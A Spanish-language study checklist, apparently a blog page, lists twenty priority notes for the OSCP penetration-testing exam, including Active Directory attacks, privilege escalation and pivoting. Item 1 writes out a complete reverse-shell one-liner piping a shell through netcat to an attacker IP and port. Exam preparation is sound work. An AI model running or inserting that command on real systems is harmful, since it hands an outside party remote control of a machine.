Salta el contingut

Top 20 Notas Prioritarias para OSCP

Estas son las notas que, si te faltan en medio del examen, vas a sufrir. Créalas antes del examen.

Fundamentos & Acceso

  1. Reverse Shells (One-Liners): Bash, Python, PowerShell, Netcat, PHP. (Memo: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f).
  2. Upgrading Shells (Interactive TTY): Python pty.spawn(), stty raw -echo, export TERM=xterm. Vital para que no se te cierre el shell con Ctrl+C.
  3. File Transfers (Windows/Linux):
    • Win: certutil, iwr (Powershell), SMB (copy \\Attacker\share\file).
    • Lin: wget, curl, nc, scp.
    • Improvised: Python HTTP Server, FTP Server.
  4. Tunneling/Pivoting: Chisel (Cliente/Servidor) y Ligolo-ng. Esto es OBLIGATORIO para la parte de Active Directory. Aprende a hacer port forwarding rápido.

Enumeración

  1. Nmap Strategy: Escaneo rápido (-T4 -p-) vs Escaneo Detallado (-sC -sV). No escanees todo UDP a menos que estés desesperado.
  2. SMB Enumeration: enum4linux, crackmapexec, login nulo, shares anónimos. Es el vector de entrada #1 en Windows.
  3. Web Fuzzing (Directories/Files): gobuster, feroxbuster. Ten a mano los wordlists correctos (common.txt, directory-list-2.3-medium.txt).

Web Attacks (Common)

  1. SQL Injection (Manual): UNION SELECT, Error based, y cómo usar sqlmap (aunque está restringido, aprende a dumpear manual).
  2. LFI (Local File Inclusion): Log Poisoning (Apache/SSH) para RCE. Wrappers de PHP (php://filter).
  3. CMS Vulnerabilities: WordPress (wpscan), Joomla. Saber dónde están los config files con credenciales.

Active Directory (The Core)

  1. Initial Access / Recon: PowerView (Get-DomainUser, Get-DomainComputer) y BloodHound (Ingestores sharphound).
  2. Kerberoasting: Solicitar TGS para cuentas de servicio. GetUserSPNs.py (Impacket) o Rubeus.
  3. ASREPRoasting: Usuarios con "Do not require Kerberos preauthentication".
  4. Pass-the-Hash / Overpass-the-Hash: Usar hashes NTLM para autenticarse sin password plano. crackmapexec, evil-winrm.
  5. Silver/Golden Tickets: Persistencia y escalada final. Saber forjar tickets con el KRBTGT hash.

Privilege Escalation (Windows)

  1. Service Abuse: Servicios con permisos débiles, Unquoted Service Paths, DLL Hijacking. PowerUp.ps1.
  2. Potato Attacks: PrintSpoofer, GodPotato, RoguePotato para escalar de Service Account a SYSTEM.

Privilege Escalation (Linux)

  1. SUID / Sudo Rights: Binarios con bit SUID (+s) que permiten ejecución como root (GTFOBins es tu biblia aquí).
  2. Cron Jobs: Tareas programadas editables o scripts a los que les falta el path absoluto.

Password Cracking

  1. Hashcat / John: Sintaxis para reconocer y crackear formatos comunes (NTLM, MD5, SHA512, Kerberos 5). Ten un "cheatsheet de modos" (ej: NTLM = 1000).